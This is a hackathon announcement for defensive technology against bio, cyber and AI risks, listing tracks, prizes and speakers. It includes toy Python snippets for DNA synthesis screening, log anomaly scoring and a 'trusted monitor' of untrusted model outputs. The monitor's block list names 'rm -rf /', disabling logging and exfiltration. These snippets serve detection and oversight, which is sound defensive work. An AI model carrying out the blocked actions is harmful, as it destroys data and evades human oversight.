What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

Some types of technology make the world better far more reliably than others, and it takes active human intention to steer toward the directions we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals, both valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens
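
As a toy illustration of the DNA synthesis screening direction, the sketch below flags an order that shares enough overlapping k-mers with any sequence on a hazard list. The hazard sequence, k=12, and the 3-hit threshold are made-up placeholders; real screening systems use curated hazard databases and much more sophisticated homology search.

```python
def kmers(seq: str, k: int = 12) -> set[str]:
    """All overlapping k-mers of a DNA sequence, uppercased."""
    seq = seq.upper()
    return {seq[i:i + k] for i in range(len(seq) - k + 1)}

def screen_order(order_seq: str, hazard_seqs: list[str], k: int = 12,
                 min_hits: int = 3) -> bool:
    """Flag a synthesis order if it shares at least `min_hits`
    k-mers with any sequence on the hazard list."""
    order_kmers = kmers(order_seq, k)
    for hazard in hazard_seqs:
        if len(order_kmers & kmers(hazard, k)) >= min_hits:
            return True
    return False

# Hypothetical hazard-list entry, purely for illustration.
hazard_db = ["ATGCGTACGTTAGCATGCCGTA"]
```

Exact k-mer matching is trivially evaded by synonymous codon substitutions, which is exactly the kind of gap a hackathon project could attack, for example with protein-level or fuzzy matching.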

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure
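
One simple primitive behind detecting novel attack patterns is scoring events by how rare they are relative to the recent stream. The sketch below is a deliberately naive frequency-based version, and the event strings are invented examples; a serious tool would parse structured logs and model behavior over time.

```python
from collections import Counter

def novelty_scores(events: list[str]) -> list[float]:
    """Score each event by the rarity of its exact pattern in the
    stream: score = 1 / count(pattern). Rare events score near 1.0."""
    counts = Counter(events)
    return [1.0 / counts[e] for e in events]

# Routine logins dominate the stream; one never-seen event stands out.
events = (["login ok user=alice"] * 50
          + ["login ok user=bob"] * 40
          + ["exec /tmp/.x payload"])  # hypothetical anomalous event
scores = novelty_scores(events)
```

Unsupervised rarity scoring like this is how defenders surface attacks with no known signature, which is the regime AI-generated attack tooling pushes us into.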

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.
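
As a flavor of the AI-control-dashboard idea, a trusted component screening an untrusted model's outputs before they take effect, here is a toy monitor. The marker list stands in for a real trusted scoring model and is purely illustrative; in an actual control setup a separate trusted model would assign the risk verdict.

```python
from dataclasses import dataclass

@dataclass
class Verdict:
    allowed: bool
    reason: str

# Hypothetical markers standing in for a trusted scoring model.
SUSPICIOUS_MARKERS = ("rm -rf /", "disable logging", "exfiltrate")

def trusted_monitor(untrusted_output: str) -> Verdict:
    """Screen an untrusted model's proposed output; block anything
    containing a suspicious marker and record why."""
    lowered = untrusted_output.lower()
    for marker in SUSPICIOUS_MARKERS:
        if marker in lowered:
            return Verdict(False, f"flagged marker: {marker!r}")
    return Verdict(True, "no markers found")
```

The interesting engineering is everything around this function: routing blocked outputs to human review, auditing the monitor itself, and keeping the trusted model genuinely independent of the one it watches.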

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters: ability to build functional systems, willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source defensive tools, monitoring systems, scenario analyses, or empirical research that strengthens our defenses against AI-enabled threats

What happens next

Winning and promising projects will be:

  • Awarded a share of the $20,000 total cash prize pool.

  • Awarded a fully-funded trip to London to take part in BlueDot Impact's December Incubator Accelerator week (Dec 1-5).

  • Guaranteed a spot in BlueDot Impact's AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


Speakers & Collaborators

Geoff Ralston

Speaker

Geoff Ralston is the former President of Y Combinator. He was the CEO of La La Media, Inc., developer of Lala, a web browser-based music distribution site. Prior to Lala, Ralston worked for Yahoo!, where he was Vice President of Engineering and Chief Product Officer. In 1997, Ralston created Yahoo! Mail.

Nora Ammann

Speaker

Nora is an interdisciplinary researcher with expertise in complex systems, philosophy of science, political theory and AI. She focuses on the development of transformative AI and understanding intelligent behavior in natural, social, or artificial systems. Before ARIA, she co-founded and led PIBBSS, a research initiative exploring interdisciplinary approaches to AI risk, governance and safety.

Esben Kran

Speaker

Esben is the CEO and Chairman of Apart. He has published award-winning AI safety research in domains including cybersecurity, autonomy preservation, and interpretability. He is involved in numerous efforts to ensure AI remains safe for humanity.

Joshua Landes

Organizer

Joshua Landes leads Community & Training at BlueDot Impact, where he runs the AISF community and facilitates AI Governance and Economics of Transformative AI courses. Previously, he worked at AI Safety Germany and the Center for AI Safety, after managing political campaigns for FDP in Germany.

Raina MacIntyre

Speaker

Raina MacIntyre is Head of the Biosecurity Program at the Kirby Institute, UNSW Australia. She is a physician and epidemiologist, recognized internationally for her research on the prevention and detection of epidemic infections, with a focus on pandemics, epidemics, bioterrorism and vaccines.

Zainab Majid

Speaker

Zainab works at the intersection of AI safety and cybersecurity, leveraging her expertise in incident response investigations to tackle AI security challenges.

Al-Hussein Saqr

Organizer

Registered Local Sites

Register A Location

Besides remote participation, our amazing organizers also host local hackathon sites where you can meet up in person and connect with others in your area.

The in-person events for the Apart Sprints are run by passionate individuals just like you! We organize the schedule, speakers, and starter templates, and you can focus on engaging your local research, student, and engineering community.
